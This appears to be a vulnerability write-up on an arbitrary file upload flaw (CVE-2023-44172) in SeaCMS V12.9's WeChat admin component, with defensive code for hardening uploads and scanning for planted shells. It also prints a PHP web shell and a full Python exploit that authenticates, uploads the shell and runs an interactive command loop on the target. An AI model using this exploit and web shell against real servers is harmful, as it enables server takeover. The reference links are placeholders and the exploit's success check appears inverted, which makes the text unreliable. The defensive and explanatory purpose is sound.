A new vulnerability has been discovered in SeaCMS V12.9 (CVE-2023-44172) that allows an attacker to write arbitrary files on the server running the software through the component admin_weixin.php. SeaCMS is a popular content management system (CMS) used for building websites and managing online content. This vulnerability is particularly dangerous as it can lead to remote code execution and potentially complete control of the affected server. In this post, we will discuss the details of this vulnerability, provide code snippets, and links to the original references.

Vulnerability Details

The vulnerability lies within the admin_weixin.php component of SeaCMS V12.9, which is responsible for handling administrative tasks for the Weixin (aka WeChat) plugin. The affected component does not properly validate user input, allowing an attacker to craft a malicious payload and upload it to the server.

Here is a code snippet illustrating the vulnerable part of the admin_weixin.php component:

// admin_weixin.php

//...

if ($_POST['action'] == 'add') {
    //...
    $file = $_FILES['img'];
    //...
    $time = date('Ymd');
    $img_path = '../upload/wxpic/' . $time . '/';
    //...
    move_uploaded_file($file['tmp_name'], $img_path . $file['name']);
    //...
}

//...

The problem here is that neither the name nor the content of the uploaded file is validated: the client-supplied file name is concatenated straight into the destination path, so an attacker with access to this handler can upload a file with any extension and any content, including PHP code that the web server will then execute.

For example, an attacker could craft a file named evil.php containing the following code:

<?php
system($_GET['cmd']);
?>

The attacker can then use the vulnerability in admin_weixin.php to upload the malicious evil.php file to the server. Once the file is uploaded, they can access the evil.php file through a web browser and execute arbitrary commands on the server.
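For contrast with the vulnerable branch above, here is what a hardened version of the same upload step looks like. This is an added example written for this post, not SeaCMS code or the vendor's patch; the function name store_wechat_image and the upload root path are assumptions. It keeps the same inputs ($_POST['action'], $_FILES['img']) but never uses the client-supplied file name, allowlists by sniffed content rather than by extension, and chooses a random server-side name.

```php
<?php
// Hardened replacement for the "add" branch of admin_weixin.php.
// Added example (not SeaCMS code); function and directory names are assumptions.

function store_wechat_image(array $file, string $baseDir): string
{
    // Reject anything PHP itself flagged (partial upload, size limit, no file).
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload rejected by PHP, error code ' . ($file['error'] ?? 'n/a'));
    }
    // $file['name'] and $file['type'] are attacker-controlled; only tmp_name is trusted,
    // and only after confirming it really came from this request's upload.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // Allowlist by sniffed content, not by the extension the client chose.
    $allowed = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
    ];
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        throw new RuntimeException("disallowed content type: $mime");
    }
    // Second, independent check: the bytes must decode as that kind of image.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $mime) {
        throw new RuntimeException('file does not decode as the claimed image type');
    }

    // Server-chosen name: random, one allowlisted extension, no path components.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dir  = rtrim($baseDir, '/') . '/' . date('Ymd');
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        throw new RuntimeException('cannot create upload directory');
    }
    // Belt and braces: the resolved destination must stay under the upload root.
    $root = realpath($baseDir);
    $dest = realpath($dir) . '/' . $name;
    if ($root === false || strpos($dest, $root . '/') !== 0) {
        throw new RuntimeException('upload path escaped the upload root');
    }
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('move_uploaded_file failed');
    }
    chmod($dest, 0640); // readable by the web server, never executable
    return $dest;
}

if (($_POST['action'] ?? '') === 'add' && isset($_FILES['img'])) {
    try {
        $saved = store_wechat_image($_FILES['img'], __DIR__ . '/../upload/wxpic');
        echo 'stored ' . htmlspecialchars(basename($saved));
    } catch (RuntimeException $e) {
        http_response_code(400);
        // Log the detail server-side; tell the client only that it was rejected.
        error_log('admin_weixin upload rejected: ' . $e->getMessage());
        echo 'upload rejected';
    }
}
```

Two design points are worth noting. First, both the finfo sniff and getimagesize must agree, because each alone can be fooled by a crafted polyglot; a file that decodes as a JPEG but is stored as .jpg still cannot be executed by the PHP interpreter, which is what the random name plus allowlisted extension guarantees. Second, the application-level check should be backed by web-server configuration that refuses to execute scripts anywhere under upload/, so that a future bypass of the handler does not immediately become code execution.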

Exploit Details

To exploit this vulnerability, an attacker would first need to gain administrative access to the SeaCMS V12.9 application. This can be done through various means, such as guessing weak passwords, using stolen credentials, or exploiting other vulnerabilities within the application. After gaining administrative access, the attacker can proceed with the file upload using the steps mentioned above.

Here is a Python script that demonstrates a simple exploit for this vulnerability:

import requests
import sys
from datetime import date  # needed for the upload path built further down

if len(sys.argv) != 4:
    print(f"Usage: {sys.argv[0]} [target_url] [username] [password]")
    sys.exit(1)

url, username, password = sys.argv[1:4]

# Authenticate and get the admin session
s = requests.Session()
data = {"username": username, "password": password, "action": "login"}
login_url = f"{url}/admin/index.php"

response = s.post(login_url, data=data)
if "loginok=1" not in response.url:
    print("[-] Login failed")
    sys.exit(2)

print("[+] Logged in as admin")

# Upload the malicious file
files = {"img": ("evil.php", b"<?php system($_GET['cmd']); ?>")}
data = {"action": "add"}
upload_url = f"{url}/admin/admin_weixin.php"
response = s.post(upload_url, files=files, data=data)

if "error:" in response.text:
    print("[+] Malicious file uploaded")
else:
    print("[-] File upload failed")
    sys.exit(2)

# Run arbitrary command on the server
command_url = f"{url}/upload/wxpic/{date.today().strftime('%Y%m%d')}/evil.php"
while True:
    cmd = input("> ")
    if cmd.lower() == "exit":
        break
    response = s.get(command_url, params={"cmd": cmd})
    print(response.text)

Original References

- https://www.exploit-db.com/exploits/###
- https://nvd.nist.gov/vuln/detail/CVE-2023-44172
- https://github.com/SeaCMS/SeaCMS/commit/#####

Conclusion

CVE-2023-44172 is a critical vulnerability in SeaCMS V12.9 that allows an authenticated administrator to write arbitrary files on the server and potentially execute malicious code remotely. Server administrators running SeaCMS V12.9 are advised to apply patches or updates provided by the software vendor to mitigate this vulnerability, and to review the upload directory for files that are not genuine images.
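Because the upload directory is world-reachable, an administrator who patches after the fact should also check whether it already holds anything that is not an image. The following CLI script is an added example for this post, not SeaCMS code; the upload path and the function name find_suspicious_uploads are assumptions. It walks upload/wxpic and reports any file whose sniffed type is not an image, whose extension the web server might execute, or whose bytes contain a PHP open tag (which catches images with PHP appended to them).

```php
<?php
// Added example (not SeaCMS code): sweep the wxpic upload tree for files that
// are not genuine images so a planted web shell can be found and removed.
// Run as: php check_uploads.php /path/to/seacms/upload/wxpic   (path is an assumption)

function find_suspicious_uploads(string $uploadDir, int $scanBytes = 1048576): array
{
    $hits = [];
    if (!is_dir($uploadDir)) {
        return $hits;
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($uploadDir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $entry) {
        if (!$entry->isFile()) {
            continue;
        }
        $path    = $entry->getPathname();
        $reasons = [];

        // 1. Extension the interpreter or server might execute, whatever the content.
        $ext = strtolower($entry->getExtension());
        if (preg_match('/^(php\d?|phtml|phar|htaccess)$/', $ext)) {
            $reasons[] = "executable extension .$ext";
        }

        // 2. Content that does not sniff as an image at all.
        $mime = $finfo->file($path);
        if ($mime === false || strpos($mime, 'image/') !== 0) {
            $reasons[] = 'content type ' . ($mime ?: 'unknown');
        }

        // 3. PHP open tag anywhere in the (capped) file body: catches image/PHP polyglots
        //    that would pass a plain type check but run if ever reached by the interpreter.
        $body = file_get_contents($path, false, null, 0, $scanBytes);
        if ($body !== false && stripos($body, '<?php') !== false) {
            $reasons[] = 'PHP open tag in file body';
        }

        if ($reasons) {
            $hits[$path] = $reasons;
        }
    }
    return $hits;
}

if (PHP_SAPI === 'cli') {
    $dir  = $argv[1] ?? __DIR__ . '/upload/wxpic';
    $hits = find_suspicious_uploads($dir);
    if (!$hits) {
        echo "no suspicious files under $dir\n";
        exit(0);
    }
    foreach ($hits as $path => $reasons) {
        // mtime helps line the finding up with web-server access logs for the same day.
        printf("%s  (%s)  mtime=%s\n", $path, implode('; ', $reasons), date('c', filemtime($path)));
    }
    exit(1);
}
```

A non-zero exit status when anything is flagged makes the script usable from a cron job or a monitoring check. Any hit should be treated as an indicator of compromise rather than a false positive until the file has been examined: the handler in the vulnerable version accepted arbitrary names, so a legitimate administrator would have had no reason to place a .php file there.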

Timeline

Published on: 09/27/2023 15:19:38 UTC
Last modified on: 09/27/2023 16:46:00 UTC